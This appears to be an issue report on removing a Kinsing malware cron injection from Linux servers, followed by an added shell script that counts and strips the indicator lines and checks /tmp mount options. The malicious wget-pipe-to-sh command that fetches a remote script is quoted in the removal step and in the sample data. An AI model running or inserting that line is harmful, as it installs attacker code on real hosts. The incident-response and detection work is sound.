Description
Recently, I found that the Kinsing malware injection had infected my servers using cloud-local. I still don't know exactly how it happened; however, we could do the following to remove it:

1. Detect its appearance:

   ```
   sudo grep CRON /var/log/syslog
   ```

2. Remove the injection via cron:

   ```
   $ crontab -e
   ```

   Remove the line:

   ```
   wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
   ```

3. Set permissions so that nobody can write to the folder `/var/tmp` or `/tmp` (except root or special users).

This is just the action needed to remove it. The server is definitely compromised, therefore data will be impacted. If anyone knows more about it, please share.
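The three steps above, as an added example that is not part of the original issue: a small POSIX sh script that counts crontab and syslog lines containing the cron indicator quoted in the issue (the `195.3.146.118` host and the `spr.sh` script name), produces a crontab with those lines removed (the non-interactive equivalent of deleting the line in `crontab -e`), and reports whether `/tmp` is mounted with `noexec,nosuid`. It checks mount options rather than removing write permission from `/tmp`, because `/tmp` is normally mode 1777 and many programs break without it. The host and script name come from the issue; the crontab, syslog and mount lines are constructed samples, and the function names are my own.

```sh
#!/bin/sh
# Added example, not from the original issue. Searches crontab/syslog text for
# the cron indicator quoted in the issue and reports /tmp mount hardening.
# The host and script name come from the issue; all sample input below is
# constructed for demonstration.
IOC_HOST='195.3.146.118'
IOC_SCRIPT='spr.sh'

# count_ioc_lines: read text on stdin, print how many lines mention the indicator.
# grep -c exits 1 when nothing matches, so "|| true" keeps the count usable under set -e.
count_ioc_lines() {
    grep -c -F -e "$IOC_HOST" -e "$IOC_SCRIPT" || true
}

# strip_ioc_lines: read crontab text on stdin, print it without indicator lines
# (the non-interactive equivalent of deleting the line in "crontab -e").
strip_ioc_lines() {
    grep -v -F -e "$IOC_HOST" -e "$IOC_SCRIPT" || true
}

# tmp_mount_options: read /proc/mounts-style text on stdin and print the mount
# options of /tmp, or "not-a-mount" when /tmp lives on the root filesystem.
tmp_mount_options() {
    awk '$2 == "/tmp" { print $4; found = 1 } END { if (!found) print "not-a-mount" }'
}

# tmp_is_hardened OPTIONS: succeed only when OPTIONS contain both noexec and nosuid.
tmp_is_hardened() {
    case ",$1," in
        *,noexec,*) case ",$1," in *,nosuid,*) return 0 ;; esac ;;
    esac
    return 1
}

# Constructed sample data (not real captures).
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1'

SAMPLE_SYSLOG='Mar  1 12:00:01 host CRON[1234]: (root) CMD (/usr/local/bin/backup.sh)
Mar  1 12:01:01 host CRON[1240]: (root) CMD (wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1)'

SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0'

# Demonstration on the samples; on a live host replace the printf pipelines with
# "crontab -l", "grep CRON /var/log/syslog" and "cat /proc/mounts".
echo "indicator lines in crontab: $(printf '%s\n' "$SAMPLE_CRONTAB" | count_ioc_lines)"
echo "indicator lines in syslog:  $(printf '%s\n' "$SAMPLE_SYSLOG" | count_ioc_lines)"
echo "cleaned crontab:"
printf '%s\n' "$SAMPLE_CRONTAB" | strip_ioc_lines
opts=$(printf '%s\n' "$SAMPLE_MOUNTS" | tmp_mount_options)
if tmp_is_hardened "$opts"; then
    echo "/tmp mount options ($opts): noexec and nosuid set"
else
    echo "/tmp mount options ($opts): missing noexec and/or nosuid"
fi
```

On a real host, run `crontab -l | strip_ioc_lines` for each user (and review `/etc/cron.d` and `/etc/crontab` by hand) before reinstalling the cleaned file with `crontab <file>`; the issue's own point stands that removing the cron entry does not undo the compromise, so the output is evidence for the incident record, not a sign the server is clean.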